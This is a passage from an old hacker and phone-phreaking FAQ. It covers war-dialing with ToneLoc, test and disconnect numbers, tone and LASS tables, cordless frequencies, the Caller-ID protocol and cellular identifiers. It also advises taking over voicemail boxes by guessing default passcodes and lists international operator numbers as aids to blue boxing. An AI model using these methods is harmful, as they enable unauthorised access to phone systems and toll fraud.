  4085. N 818  xxx-1119              Pasadena, CA
  4086. N 818  xxx-9198              Pasadena, CA
  4087. U 818  885-0699              Pasadena, CA  (???-0699 is a pattern)
  4088. N 860  525-7078              Hartford, CT
  4089.   906  632-9999              Marquette/Sault Ste. Marie, MI
  4090.   906  635-9999              Marquette/Sault Ste. Marie, MI
  4091.  
  4092.  
  4093. 19. What are some numbers that temporarily disconnect phone service?
  4094.  
  4095.   If your NPA is not listed, or the listing does not cover your LATA,
  4096.   try common numbers such as 119 (GTD5 switches) or 511.
  4097.  
  4098.   314  511        Columbia/Jefferson City/St.Louis, MO       (1 minute)
  4099.   404  420        Atlanta, GA                                (5 minutes)
  4100.   405  953        Enid/Oklahoma City, OK                     (1 minute)
  4101. U 407  511        Orlando, FL (United Telephone)             (1 minute)
  4102. N 414 958-0013    Fond du Lac/Green Bay/Milwaukee/Racine, WI (1 minute)
  4103.   512  200        Austin/Corpus Christi, TX                  (1 minute)
  4104.   516  480        Hempstead/Long Island, NY                  (1 minute)
  4105.   603  980        NH
  4106.   614  xxx-9894   Columbus/Steubenville, OH
  4107.   805  119        Bakersfield/Santa Barbara, CA              (3 minutes)
  4108.   919  211 or 511 Durham, NC                                 (10 min - 1 hour)
  4109.  
  4110.  
  4111. 20. What is a Proctor Test Set?
  4112.  
  4113. A Proctor Test Set is a tool used by telco personnel to diagnose
  4114. problems with phone lines.  You call the Proctor Test Set number and
  4115. press buttons on a touch tone phone to active the tests you select.
  4116.  
  4117.  
  4118. 21. What is a Proctor Test Set in my area?
  4119.  
  4120.   If your NPA is not listed try common numbers such as 111 or 117.
  4121.  
  4122.   805  111        Bakersfield/Santa Barbara, CA
  4123.   909  117        Tyler, TX
  4124.   913  611-1111   Lawrence/Salina/Topeka, KS
  4125.  
  4126.  
  4127. 22. What is scanning?
  4128.  
  4129. Scanning is dialing a large number of telephone numbers in the hope
  4130. of finding interesting carriers (computers) or tones.
  4131.  
  4132. Scanning can be done by hand, although dialing several thousand
  4133. telephone numbers by hand is extremely boring and takes a long time.
  4134.  
  4135. Much better is to use a scanning program, sometimes called a war
  4136. dialer or a demon dialer.  Currently, the best war dialer available to
  4137. PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.  ToneLoc can
  4138. be ftp'd from ftp.paranoia.com /pub/toneloc/.
  4139.  
  4140. A war dialer will dial a range of numbers and log what it finds at
  4141. each number.  You can then only dial up the numbers that the war
  4142. dialer marked as carriers or tones.
  4143.  
  4144.  
  4145. 23. Is scanning illegal?
  4146.  
  4147. Excerpt from: 2600, Spring 1990, Page 27:
  4148.  
  4149. -BQ-
  4150. In some places, scanning has been made illegal.  It would be hard,
  4151. though, for someone to file a complaint against you for scanning since
  4152. the whole purpose is to call every number once and only once.  It's
  4153. not likely to be thought of as harassment by anyone who gets a single
  4154. phone call from a scanning computer.  Some central offices have been
  4155. known to react strangely when people start scanning.  Sometimes you're
  4156. unable to get a dialtone for hours after you start scanning.  But
  4157. there is no uniform policy.  The best thing to do is to first find out
  4158. if you've got some crazy law saying you can't do it.  If, as is
  4159. likely, there is no such law, the only way to find out what happens is
  4160. to give it a try.
  4161. -EQ-
  4162.  
  4163. It should be noted that a law making scanning illegal was recently
  4164. passed in Colorado Springs, CO.  It is now illegal to place a call
  4165. in Colorado Springs without the intent to communicate.
  4166.  
  4167.  
  4168. 24. Where can I purchase a lineman's handset?
  4169.  
  4170. Contact East
  4171. 335 Willow Street
  4172. North Andover, MA 01845-5995
  4173. (508)682-2000
  4174.  
  4175. Jensen Tools
  4176. 7815 S. 46th Street
  4177. Phoenix, AZ 85044-5399
  4178. (800)426-1194
  4179.  
  4180. Specialized Products
  4181. 3131 Premier Drive
  4182. Irving, TX 75063
  4183. (800)866-5353
  4184.  
  4185. Time Motion Tools
  4186. 12778 Brookprinter Place
  4187. Poway, CA 92064
  4188. (619)679-0303
  4189.  
  4190.  
  4191. 25. What are the DTMF frequencies?
  4192.  
  4193. DTMF stands for Dual Tone Multi Frequency.  These are the tones you get
  4194. when you press a key on your telephone touch pad.  The tone of the
  4195. button is the sum of the column and row tones.  The ABCD keys do not
  4196. exist on standard telephones.
  4197.  
  4198. . 1209 1336 1477 1633
  4199.  
  4200.      697   1    2    3    A
  4201.  
  4202.      770   4    5    6    B
  4203.  
  4204.      852   7    8    9    C
  4205.  
  4206.      941   *    0    #    D
  4207.  
  4208.  
  4209. 26. What are the frequencies of the telephone tones?
  4210.  
  4211. Type                Hz          On      Off
  4212. ---------------------------------------------------------------------
  4213. Dial Tone         350 & 440     ---     ---
  4214. Busy Signal       480 & 620     0.5     0.5
  4215. Toll Congestion   480 & 620     0.2     0.3
  4216. Ringback (Normal) 440 & 480     2.0     4.0
  4217. Ringback (PBX)    440 & 480     1.5     4.5
  4218. Reorder (Local)   480 & 620     3.0     2.0
  4219. Invalid Number    200 & 400
  4220. Hang Up Warning 1400 & 2060     0.1     0.1
  4221. Hang Up         2450 & 2600     ---     ---
  4222.  
  4223.  
  4224. 27. What are all of the * (LASS) codes?
  4225.  
  4226. Local Area Signalling Services (LASS) and Custom Calling Feature
  4227. Control Codes:
  4228.  
  4229. (These appear to be standard, but may be changed locally)
  4230.  
  4231. Service                     Tone    Pulse/rotary   Notes
  4232. --------------------------------------------------------------------------
  4233. Assistance/Police           *12         n/a        [1]
  4234. Cancel forwarding           *30         n/a        [C1]
  4235. Automatic Forwarding        *31         n/a        [C1]
  4236. Notify                      *32         n/a        [C1] [2]
  4237. Intercom Ring 1 (..)        *51         1151       [3]
  4238. Intercom Ring 2 (.._)       *52         1152       [3]
  4239. Intercom Ring 3 (._.)       *53         1153       [3]
  4240. Extension Hold              *54         1154       [3]
  4241. Customer Originated Trace   *57         1157
  4242. Selective Call Rejection    *60         1160       (or Call Screen)
  4243. Selective Distinct Alert    *61         1161
  4244. Selective Call Acceptance   *62         1162
  4245. Selective Call Forwarding   *63         1163
  4246. ICLID Activation            *65         1165
  4247. Call Return (outgoing)      *66         1166
  4248. Number Display Blocking     *67         1167       [4]
  4249. Computer Access Restriction *68         1168
  4250. Call Return (incoming)      *69         1169
  4251. Call Waiting disable        *70         1170       [4]
  4252. No Answer Call Transfer     *71         1171
  4253. Usage Sensitive 3 way call  *71         1171
  4254. Call Forwarding: start      *72 or 72#  1172
  4255. Call Forwarding: cancel     *73 or 73#  1173
  4256. Speed Calling (8 numbers)   *74 or 74#  1174
  4257. Speed Calling (30 numbers)  *75 or 75#  1175
  4258. Anonymous Call Rejection    *77         1177       [5] [M: *58]
  4259. Call Screen Disable         *80         1180       (or Call Screen) [M: *50]
  4260. Selective Distinct Disable  *81         1181       [M: *51]
  4261. Select. Acceptance Disable  *82         1182       [4] [7]
  4262. Select. Forwarding Disable  *83         1183       [M: *53]
  4263. ICLID Disable               *85         1185
  4264. Call Return (cancel out)    *86         1186       [6] [M: *56]
  4265. Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
  4266. Call Return (cancel in)     *89         1189       [6] [M: *59]
  4267.  
  4268. Notes:
  4269.  
  4270. [C1]     - Means code used for Cellular One service
  4271. [1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
  4272. [2]      - indicates that you are not local and maybe how to reach you
  4273. [3]      - found in Pac Bell territory; Intercom ring causes a distinctive
  4274.            ring to be generated on the current line; Hold keeps a call
  4275.            connected until another extension is picked up
  4276. [4]      - applied once before each call
  4277. [5]      - A.C.R. blocks calls from those who blocked Caller ID
  4278.            (used in C&P territory, for instance)
  4279. [6]      - cancels further return attempts
  4280. [7]      - *82 (1182) has been mandated to be the nationwide code for
  4281.            "Send CLID info regardless of the default setting on this
  4282.            phone line."
  4283. [M: *xx] - alternate code used for MLVP (multi-line variety package)
  4284.            by Bellcore. It goes by different names in different RBOCs.
  4285.            In Bellsouth it is called Prestige. It is an arrangement of
  4286.            ESSEX like features for single or small multiple line groups.
  4287.  
  4288.            The reason for different codes for some features in MLVP is that
  4289.            call-pickup is *8 in MLVP so all *8x codes are reassigned *5x
  4290.  
  4291.  
  4292. 28. What frequencies do cordless phones operate on?
  4293.  
  4294. Here are the frequencies for the first generation 46/49mhz phones.
  4295.  
  4296. Channel    Handset Transmit    Base Transmit
  4297. -------    ----------------    -------------
  4298.    1          49.670mhz          46.610mhz
  4299.    2          49.845             46.630
  4300.    3          49.860             46.670
  4301.    4          49.770             46.710
  4302.    5          49.875             46.730
  4303.    6          49.830             46.770
  4304.    7          49.890             46.830
  4305.    8          49.930             46.870
  4306.    9          49.990             46.930
  4307.   10          49.970             46.970
  4308.  
  4309.  
  4310. The new "900mhz" cordless phones have been allocated the frequencies
  4311. between 902-228MHz, with channel spacing between 30-100KHz.
  4312.  
  4313. Following are some examples of the frequencies used by phones
  4314. currently on the market.
  4315.  
  4316. ---------------------------------------------------------------- 
  4317. Panasonic KX-T9000 (60 Channels)  
  4318. base     902.100 - 903.870 Base frequencies (30Khz spacing) 
  4319. handset  926.100 - 927.870 Handset frequencies 
  4320. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  4321. --  -------  -------    --  -------  -------    --  ------- -------
  4322. 01  902.100  926.100    11  902.400  926.400    21  902.700 926.700
  4323. 02  902.130  926.130    12  902.430  926.430    22  902.730 926.730
  4324. 03  902.160  926.160    13  902.460  926.460    23  902.760 926.760
  4325. 04  902.190  926.190    14  902.490  926.490    24  902.790 926.790
  4326. 05  902.220  926.220    15  902.520  926.520    25  902.820 926.820
  4327. 06  902.250  926.250    16  902.550  926.550    26  902.850 926.850
  4328. 07  902.280  926.280    17  902.580  926.580    27  902.880 926.880
  4329. 08  902.310  926.310    18  902.610  926.610    28  902.910 926.910
  4330. 09  902.340  926.340    19  902.640  926.640    29  902.940 926.940
  4331. 10  902.370  926.370    20  902.670  926.670    30  902.970 926.970
  4332.  
  4333. 31  903.000  927.000    41  903.300  927.300    51  903.600 927.600
  4334. 32  903.030  927.030    42  903.330  927.330    52  903.630 927.630
  4335. 33  903.060  927.060    43  903.360  927.360    53  903.660 927.660
  4336. 34  903.090  927.090    44  903.390  927.390    54  903.690 927.690
  4337. 35  903.120  927.120    45  903.420  927.420    55  903.720 927.720
  4338. 36  903.150  927.150    46  903.450  927.450    56  903.750 927.750
  4339. 37  903.180  927.180    47  903.480  927.480    57  903.780 927.780
  4340. 38  903.210  927.210    48  903.510  927.510    58  903.810 927.810
  4341. 39  903.240  927.240    49  903.540  927.540    59  903.840 927.840
  4342. 40  903.270  927.270    50  903.570  927.570    60  903.870 927.870
  4343.  
  4344. ------------------------------------------------------------ 
  4345.  
  4346. V-TECH TROPEZ DX900 (20 CHANNELS) 
  4347. 905.6 - 907.5   TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
  4348. 925.5 - 927.4   HANDSET FREQUENCIES 
  4349.  
  4350. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  4351. --  -------  -------    --  -------  -------    --  ------- -------
  4352. 01  905.600  925.500    08  906.300  926.200    15  907.000 926.900
  4353. 02  905.700  925.600    09  906.400  926.300    16  907.100 927.000
  4354. 03  905.800  925.700    10  906.500  926.400    17  907.200 927.100
  4355. 04  905.900  925.800    11  906.600  926.500    18  907.300 927.200
  4356. 05  906.000  925.900    12  906.700  926.600    19  907.400 927.300
  4357. 06  906.100  926.000    13  906.800  926.700    20  907.500 927.400
  4358. 07  906.200  926.100    14  906.900  926.800 
  4359.  
  4360. ------------------------------------------------------------ 
  4361. Other 900mhz cordless phones
  4362. AT&T #9120  - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ 
  4363. OTRON CORP. #CP-1000  902.1 - 903.9 & 926.1 - 927.9 MHZ 
  4364. SAMSUNG #SP-R912- - - 903.0         &         927.0 MHZ 
  4365.  
  4366. ------------------------------------------------------------
  4367.  
  4368.  
  4369. 29. What is Caller-ID?
  4370.  
  4371. This FAQ answer is stolen from Rockwell:
  4372.  
  4373. Calling Number Delivery (CND), better known as Caller ID, is a
  4374. telephone service intended for residential and small business
  4375. customers.  It allows the called Customer Premises Equipment (CPE) to
  4376. receive a calling party's directory number and the date and time of
  4377. the call during the first 4 second silent interval in the ringing
  4378. cycle.
  4379.  
  4380. Parameters
  4381. ~~~~~~~~~~
  4382. The data signalling interface has the following characteristics:
  4383.  
  4384.         Link Type:                              2-wire, simplex
  4385. .Transmission Scheme:..Analog, phase-coherent FSK
  4386. .Logical 1 (mark)...1200 +/- 12 Hz
  4387. .Logical 0 (space)...2200 +/- 22 Hz
  4388. .Transmission Rate:...1200 bps
  4389. .Transmission Level:...13.5 +/- dBm into 900 ohm load
  4390.  
  4391.  
  4392. Protocol
  4393. ~~~~~~~~
  4394. The protocol uses 8-bit data words (bytes), each bounded by a start
  4395. bit and a stop bit.  The CND message uses the Single Data Message
  4396. format shown below.
  4397.  
  4398. | Channel  |  Carrier  |  Message  |  Message  |  Data       | Checksum |
  4399. | Seizure  |  Signal   |  Type     |  Length   |  Word(s)    | Word     |
  4400. | Signal   |           |  Word     |  Word     |             |          |
  4401.  
  4402. Channel Seizure Signal
  4403. ~~~~~~~~~~~~~~~~~~~~~~
  4404. The channel seizure is 30 continuous bytes of 55h (01010101) providing
  4405. a detectable alternating function to the CPE (i.e. the modem data
  4406. pump).
  4407.  
  4408. Carrier Signal
  4409. ~~~~~~~~~~~~~~
  4410. The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
  4411. condition the receiver for data.
  4412.  
  4413. Message Type Word
  4414. ~~~~~~~~~~~~~~~~~
  4415. The message type word indicates the service and capability associated
  4416. with the data message.  The message type word for CND is 04h
  4417. (00000100).
  4418.  
  4419. Message Length Word
  4420. ~~~~~~~~~~~~~~~~~~~
  4421. The message length word specifies the total number of data words to
  4422. follow.
  4423.  
  4424. Data Words
  4425. ~~~~~~~~~~
  4426. The data words are encoded in ASCII and represent the following
  4427. information:
  4428.  
  4429. o  The first two words represent the month
  4430. o  The next two words represent the day of the month
  4431. o  The next two words represent the hour in local military time
  4432. o  The next two words represent the minute after the hour
  4433. o  The calling party's directory number is represented by the
  4434.    remaining  words in the data word field
  4435.  
  4436. If the calling party's directory number is not available to the
  4437. terminating central office, the data word field contains an ASCII "O".
  4438. If the calling party invokes the privacy capability, the data word
  4439. field contains an ASCII "P".
  4440.  
  4441. Checksum Word
  4442. ~~~~~~~~~~~~~
  4443. The Checksum Word contains the twos complement of the modulo 256 sum
  4444. of the other words in the data message (i.e., message type, message
  4445. length, and data words).  The receiving equipment may calculate the
  4446. modulo 256 sum of the received words and add this sum to the received
  4447. checksum word.  A result of zero generally indicates that the message
  4448. was correctly received.  Message retransmission is not supported.
  4449.  
  4450. Example CNS Single Data Message
  4451. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4452. An example of a received CND message, beginning with the message type
  4453. word, follows:
  4454.  
  4455. 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
  4456.  
  4457. 04h=  Calling number delivery information code (message type word)
  4458. 12h=  18 decimal; Number of data words (date,time, and directory
  4459.       number words)
  4460. ASCII 30,39= 09; September
  4461. ASCII 33,30= 30; 30th day
  4462. ASCII 31,32= 12; 12:00 PM
  4463. ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
  4464. ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
  4465.       party's directory number
  4466. 51h=  Checksum Word
  4467.  
  4468. Data Access Arrangement (DAA) Requirements
  4469. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4470. To receive CND information, the modem monitors the phone line between
  4471. the first and second ring bursts without causing the DAA to go off
  4472. hook in the conventional sense, which would inhibit the transmission
  4473. of CND by the local central office.  A simple modification to an
  4474. existing DAA circuit easily accomplishes the task.
  4475.  
  4476. Modem Requirements
  4477. ~~~~~~~~~~~~~~~~~~
  4478. Although the data signalling interface parameters match those of a
  4479. Bell 202 modem, the receiving CPE need not be a Bell 202 modem.  A
  4480. V.23 1200 bps modem receiver may be used to demodulate the Bell 202
  4481. signal.  The ring indicate bit (RI) may be used on a modem to indicate
  4482. when to monitor the phone line for CND information.  After the RI bit
  4483. sets, indicating the first ring burst, the host waits for the RI bit
  4484. to reset.  The host then configures the modem to monitor the phone
  4485. line for CND information.
  4486.  
  4487. Signalling
  4488. ~~~~~~~~~~
  4489. According to Bellcore specifications, CND signalling starts as early
  4490. as 300 mS after the first ring burst and ends at least 475 mS before
  4491. the second ring burst
  4492.  
  4493. Applications
  4494. ~~~~~~~~~~~~
  4495. Once CND information is received the user may process the information
  4496. in a number of ways.
  4497.  
  4498. 1.  The date, time, and calling party's directory number can be
  4499.     displayed.
  4500.  
  4501. 2.  Using a look-up table, the calling party's directory number can be
  4502.     correlated with his or her name and the name displayed.
  4503.  
  4504. 3.  CND information can also be used in additional ways such as for:
  4505.  
  4506.     a.  Bulletin board applications
  4507.     b.  Black-listing applications
  4508.     c.  Keeping logs of system user calls, or
  4509.     d.  Implementing a telemarketing data base
  4510.  
  4511. References
  4512. ~~~~~~~~~~
  4513. For more information on Calling Number Delivery (CND), refer to
  4514. Bellcore publications TR-TSY-000030 and TR-TSY-000031.
  4515.  
  4516. To obtain Bellcore documents contact:
  4517.  
  4518. .Bellcore Customer Service
  4519. .60 New England Avenue, Room 1B252
  4520. .Piscataway, NJ   08834-4196
  4521. .(908) 699-5800
  4522.  
  4523.  
  4524. 30. How do I block Caller-ID?
  4525.  
  4526. Always test as much as possible before relying on any method of blocking
  4527. Caller-ID.  Some of these methods work in some areas, but not in others.
  4528.  
  4529. Dial *67 before you dial the number.  (141 in the United Kingdom)
  4530. Dial your local TelCo and have them add Caller-ID block to your line.
  4531. Dial the 0 Operator and have him or her place the call for you.
  4532. Dial the call using a pre-paid phone card.
  4533. Dial through Security Consultants at (900)PREVENT for U.S. calls
  4534.      ($1.99/minute) or (900)STONEWALL for international calls ($3.99/minute).
  4535. Dial from a pay phone.  :-)
  4536.  
  4537.  
  4538. 31. What is a PBX?
  4539.  
  4540. A PBX is a Private Branch Exchange.  A PBX is a small telephone switch
  4541. owned by a company or organization.  Let's say your company has a
  4542. thousand employees.  Without a PBX, you would need a thousand phone
  4543. lines.  However, only 10% of your employees are talking on the phone
  4544. at one time.  What if you had a computer that automatically found an
  4545. outside line every time one of your employees picked up the telephone.
  4546. With this type of system, you could get by with only paying for one
  4547. hundred phone lines.  This is a PBX.
  4548.  
  4549.  
  4550. 32. What is a VMB?
  4551.  
  4552. A VMB is a Voice Mail Box.  A VMB is a computer that acts as an
  4553. answering machine for hundreds or thousands of users.  Each user will
  4554. have their own Voice Mail Box on the system.  Each mail box will have
  4555. a box number and a pass code.
  4556.  
  4557. Without a passcode, you will usually be able to leave messages to
  4558. users on the VMB system.  With a passcode, you can read messages and
  4559. administer a mailbox.  Often, mailboxes will exist that were created
  4560. by default or are no longer used.  These mailboxes may be taken over
  4561. by guessing their passcode.  Often the passcode will be the mailbox
  4562. number or a common number such as 1234.
  4563.  
  4564.  
  4565. 33. What are the ABCD tones for?
  4566.  
  4567. The ABCD tones are simply additional DTFM tones that may be used in any
  4568. way the standard (0-9) tones are used.  The ABCD tones are used in the
  4569. U.S. military telephone network (AutoVon), in some Automatic Call
  4570. Distributor (ACD) systems, for control messages in some PBX systems, and
  4571. in some amateur radio auto-patches.
  4572.  
  4573. In the AutoVon network, special telephones are equipped with ABCD keys.
  4574. The ABCD keys are defined as such:
  4575.  
  4576. A - Flash
  4577. B - Flash override priority
  4578. C - Priority communication
  4579. D - Priority override
  4580.  
  4581. Using a built-in maintenance mode of the Automatic Call Distributor
  4582. (ACD) systems once used by Directory Assistance operators, you could
  4583. connect two callers together.
  4584.  
  4585. The purpose of the Silver Box is to create the ABCD tones.
  4586.  
  4587. See also "What are the DTMF Frequencies?"
  4588.  
  4589.  
  4590. 34. What are the International Direct Numbers?
  4591.  
  4592. The numbers are used so that you may connect to an operator from a
  4593. foreign telephone network, without incurring long distance charges.
  4594. These numbers may be useful in blue boxing, as many countries still have
  4595. older switching equipment in use.
  4596.  
  4597.   Australia         (800)682-2878
  4598.   Austria           (800)624-0043
  4599.   Belgium           (800)472-0032
  4600.   Belize            (800)235-1154
  4601.   Bermuda           (800)232-2067
  4602.   Brazil            (800)344-1055
  4603.   British VI        (800)278-6585
  4604.   Cayman            (800)852-3653
  4605.   Chile             (800)552-0056
  4606.   China (Shanghai)  (800)532-4462
  4607.   Costa Rica        (800)252-5114
  4608.   Denmark           (800)762-0045
  4609.   El Salvador       (800)422-2425
  4610.   Finland           (800)232-0358
  4611.   France            (800)537-2623
  4612.   Germany           (800)292-0049
  4613.   Greece            (800)443-5527
  4614.   Guam              (800)367-4826
  4615.   HK                (800)992-2323
  4616.   Hungary           (800)352-9469
  4617.   Indonesia         (800)242-4757
  4618.   Ireland           (800)562-6262
  4619.   Italy             (800)543-7662
  4620.   Japan             (800)543-0051
  4621.   Korea             (800)822-8256
  4622.   Macau             (800)622-2821
  4623.   Malaysia          (800)772-7369
  4624.   Netherlands       (800)432-0031
  4625.   Norway            (800)292-0047
  4626.   New Zealand       (800)248-0064
  4627.   Panama            (800)872-6106
  4628.   Portugal          (800)822-2776
  4629.   Philippines       (800)336-7445
  4630.   Singapore         (800)822-6588
  4631.   Spain             (800)247-7246
  4632.   Sweden            (800)345-0046
  4633.   Taiwan            (800)626-0979
  4634.   Thailand          (800)342-0066
  4635.   Turkey            (800)828-2646
  4636.   UK                (800)445-5667
  4637.   Uruguay           (800)245-8411
  4638.   Yugoslavia        (800)367-9842 (Belgrade)
  4639.                          367-9841 (Zagreb)
  4640.   USA from outside  (800)874-4000  Ext. 107
  4641.  
  4642.  
  4643.  
  4644.  
  4645.  
  4646. Section C: Cellular
  4647. ~~~~~~~~~~~~~~~~~~~
  4648.  
  4649. 01. What is an MTSO?
  4650.  
  4651. MTSO stands for Mobile Telephone Switching Office.  The MTSO is the
  4652. switching office that connects all of the individual cell towers to the
  4653. Central Office (CO).
  4654.  
  4655. The MTSO is responsible for monitoring the relative signal strength of
  4656. your cellular phone as reported by each of the cell towers, and
  4657. switching your conversation to the cell tower which will give you the
  4658. best possible reception.
  4659.  
  4660.  
  4661. 02. What is a NAM?
  4662.  
  4663. NAM stands for Number Assignment Module.  The NAM is the EPROM that
  4664. holds information such as the MIN and SIDH.  Cellular fraud is committed
  4665. by modifying the information stored in this component.
  4666.  
  4667.  
  4668. 03. What is an ESN?
  4669.  
  4670. ESN stands for Electronic Serial Number.  The is the serial number of
  4671. your cellular telephone.
  4672.  
  4673.  
  4674. 04. What is an MIN?
  4675.  
  4676. MIN stands for Mobile Identification Number.  This is the phone number
  4677. of the cellular telephone.
  4678.  
  4679.  
  4680. 05. What is a SCM?
  4681.  
  4682. SCM stands for Station Class Mark.  The SCM is a 4 bit number which
  4683. holds three different pieces of information.  Your cellular telephone
  4684. transmits this information (and more) to the cell tower.  Bit 1 of the
  4685. SCM tells the cell tower whether your cellphone uses the older 666
  4686. channel cellular system, or the newer 832 channel cellular system.  The
  4687. expansion to 832 channels occured in 1988.  Bit 2 tells the cellular
  4688. system whether your cellular telephone is a mobile unit or a voice
  4689. activated cellular telephone.  Bit's 3 and 4 tell the cell tower what
  4690. power your cellular telephone should be transmitting on.
  4691.  
  4692. Bit 1:    0 == 666 channels
  4693.           1 == 832 channels
  4694.  
  4695. Bit 2:    0 == Mobile cellular telephone
  4696.           1 == Voice activated cellular telephone
  4697.  
  4698. Bit 3/4: 00 == 3.0 watts (Mobiles)
  4699.          01 == 1.2 watts (Transportables)
  4700.          10 == .06 watts (Portables)
  4701.          11 == Reserved for future use
  4702.  
  4703.  
  4704. 06. What is a SIDH?
  4705.  
  4706. SIDH stands for System Identification for Home System.  The SIDH in your
  4707. cellular telephone tells the cellular system what area your cellular
  4708. service originates from.  This is used in roaming (making cellular calls
  4709. when in an area not served by your cellular provider).
  4710.  
  4711. Every geographical region has two SIDH codes, one for the wireline
  4712. carrier and one for the nonwireline carrier.  These are the two
  4713. companies that are legally allowed to provide cellular telephone service
  4714. in that region. The wireline carrier is usually your local telephone
  4715. company, while the nonwireline carrier will be another company.  The
  4716. SIDH for the wireline carrier is always an even number, while the SIDH
  4717. for the nonwireline carrier is always an odd number.  The wireline
  4718. carrier is also known as the Side-B carrier and the non-wireline carrier
  4719. is also known as the Side-A carrier.
  4720.  
  4721.  
  4722. 07. What are the forward/reverse channels?
  4723.  
  4724. Forward channels are the frequencies the cell towers use to talk to your
  4725. cellular telephone.  Reverse channels are the frequencies your cellular
  4726. telephone uses to talk to the cell towers.
  4727.  
  4728. The forward channel is usually 45 mhz above the reverse channel.  For
  4729. example, if the reverse channel is at 824 mhz, the forward channel would
  4730. be at 869 mhz.
  4731.  
  4732.  
  4733.  
  4734.  
  4735.  
  4736. Section D: Resources
  4737. ~~~~~~~~~~~~~~~~~~~~
  4738.  
  4739. 01. What are some ftp sites of interest to hackers?
  4740.  
  4741. N 204.215.84.2            /pub/dmackey
  4742.   2600.com                                                (2600 Magazine)
  4743.   aeneas.mit.edu                                          (Kerberos)
  4744.   alex.sp.cs.cmu.edu      /links/security                 (Misc)
  4745.   asylum.sf.ca.us                                    (CyberWarriors of Xanadu)
  4746. N atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari PGP)
  4747.   athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
  4748.   atlantis.utmb.edu                                       (Anti-virus)
  4749.   bellcore.com                                            (Bellcore)
  4750.   cert.org                                                (CERT)
  4751.   ciac.llnl.gov                                           (CIAC)
  4752.   clark.net               /pub/jcase                      (H/P)
  4753.   cnit.nsk.su             /pub/security                   (Security)
  4754.   coast.cs.purdue.edu     /pub                            (Security/COAST)
  4755.   coombs.anu.edu.au       /pub/security                   (Security)
  4756.   csrc.ncsl.nist.gov                                      (NIST Security)
  4757.   dartmouth.edu           /pub/security                   (Security)
  4758.   ds.internic.net                                         (Internet documents)
  4759. N dutiws.twi.tudelft.nl   /pub/novell
  4760.   etext.archive.umich.edu /pub/Zines/PrivateLine          (PrivateLine)
  4761. N fastlane.net            /pub/nomad
  4762.   ftp.3com.com            /pub/Orange-Book                (Orange Book)
  4763.   ftp.acns.nwu.edu        /pub                            (Mac Anti-virus)
  4764.   ftp.acsu.buffalo.edu    /pub/security & /pub/irc        (Security & IRC)
  4765.   ftp.alantec.com         /pub/tcpr                       (Tcpr)
  4766.   ftp.armory.com          /pub/user/kmartind              (H/P)
  4767.   ftp.armory.com          /pub/user/swallow               (H/P)
  4768.   ftp.auscert.org.au      /pub                            (Australian CERT)
  4769.   ftp.cerf.net            /pub/software/unix/security     (CERFnet)
  4770.   ftp.cert.dfn.de                                         (FIRST)
  4771.   ftp.cisco.com                                           (Cisco)
  4772.   ftp.commerce.net        /pub/standards/drafts/shttp.txt (Secure HyperText)
  4773.   ftp.cs.colorado.edu
  4774.   ftp.cs.ruu.nl           /pub/SECURITY                   (Security & PGP)
  4775.   ftp.cs.uwm.edu          /pub/comp-privacy               (Privacy Digest)
  4776.   ftp.cs.vu.nl
  4777.   ftp.cs.yale.edu
  4778.   ftp.csi.forth.gr        /pub/security
  4779.   ftp.csl.sri.com         /pub/nides                      (SRI)
  4780.   ftp.csn.org /mpj                                        (Cryptology)
  4781.   ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
  4782.   ftp.delmarva.com
  4783. N ftp.demon.co.uk         /pub/misc/0800num.txt           (0800/0500 numbers)
  4784.   ftp.denet.dk            /pub/security/tools/satan
  4785.   ftp.digex.net           /pub/access/dunk
  4786.   ftp.dsi.unimi.it        /pub/security/crypt             (Crypto)
  4787.   ftp.dstc.edu.au         /pub/security/satan
  4788.   ftp.ee.lbl.gov
  4789.   ftp.eff.org             /pub/Publications/CuD           (EFF)
  4790.   ftp.elelab.nsc.co.jp    /pub/security                   (Security)
  4791.   ftp.etext.org                                           (Etext)
  4792.   ftp.fc.net              /pub/deadkat                    (TNO)
  4793.   ftp.fc.net              /pub/defcon                     (DefCon)
  4794.   ftp.fc.net              /pub/defcon/BBEEP               (BlueBeep)
  4795.   ftp.fc.net              /pub/phrack                     (Phrack)
  4796.   ftp.foobar.com
  4797.   ftp.funet.fi            /pub/doc/CuD
  4798.   ftp.gate.net            /pub/users/laura
  4799.   ftp.gate.net            /pub/users/wakko
  4800.   ftp.giga.or.at          /pub/hacker/                    (H/P)
  4801.   ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
  4802.   ftp.IEunet.ie           /pub/security                   (Security)
  4803.   ftp.ifi.uio.no
  4804.   ftp.indirect.com        /www/evildawg/public_access/C&N/
  4805.   ftp.info.fundp.ac.be
  4806.   ftp.informatik.uni-hamburg.de
  4807.   ftp.informatik.uni-kiel.de /pub/sources/security
  4808.   ftp.inoc.dl.nec.com     /pub/security                   (Security)
  4809.   ftp.isi.edu
  4810.   ftp.lava.net            /users/oracle/                  (H/P
  4811. N ftp.leo.org/pub/com/os/os2/crypt
  4812.   ftp.lerc.nasa.gov       /security
  4813.   ftp.llnl.gov            /pub                            (CIAC)
  4814.   ftp.luth.se             /pub/unix/security
  4815.   ftp.lysator.liu.se
  4816.   ftp.mcs.anl.gov         /pub/security
  4817.   ftp.microserve.net      /ppp-pop/strata/mac             (Mac)
  4818.   ftp.near.net            /security/archives/phrack       (Zines)
  4819.   ftp.nec.com
  4820.   ftp.net.ohio-state.edu  /pub/security/satan
  4821.   ftp.netcom.com          /pub/br/bradleym                (Virii)
  4822.   ftp.netcom.com          /pub/da/daemon9                 (H/P)
  4823.   ftp.netcom.com          /pub/fi/filbert
  4824. N ftp.netcom.com          /pub/gr/grady
  4825. N ftp.netcom.com          /pub/il/illusion                (H/P+Virus)
